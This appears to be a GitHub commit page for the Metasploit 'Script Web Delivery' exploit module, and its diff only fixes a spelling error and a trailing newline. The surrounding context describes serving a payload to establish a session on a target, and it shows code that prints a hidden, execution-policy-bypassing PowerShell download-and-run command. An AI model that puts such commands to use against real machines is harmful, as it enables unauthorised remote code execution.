Skip to content

Commit a735fd3

Browse files
committed
Update web_delivery.rb
1 parent 4da28f1 commit a735fd3

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/multi/script/web_delivery.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@ def initialize(info = {})
1515
'Name' => 'Script Web Delivery',
1616
'Description' => %q{
1717
This module quickly fires up a web server that serves a payload.
18-
The provided command will start the specified scripting langauge interpreter and then download and execute the
18+
The provided command will start the specified scripting language interpreter and then download and execute the
1919
payload. The main purpose of this module is to quickly establish a session on a target
2020
machine when the attacker has to manually type in the command himself, e.g. Command Injection,
2121
RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
@@ -88,4 +88,4 @@ def primer
8888
print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
8989
end
9090
end
91-
end
91+
end

0 commit comments

Comments
 (0)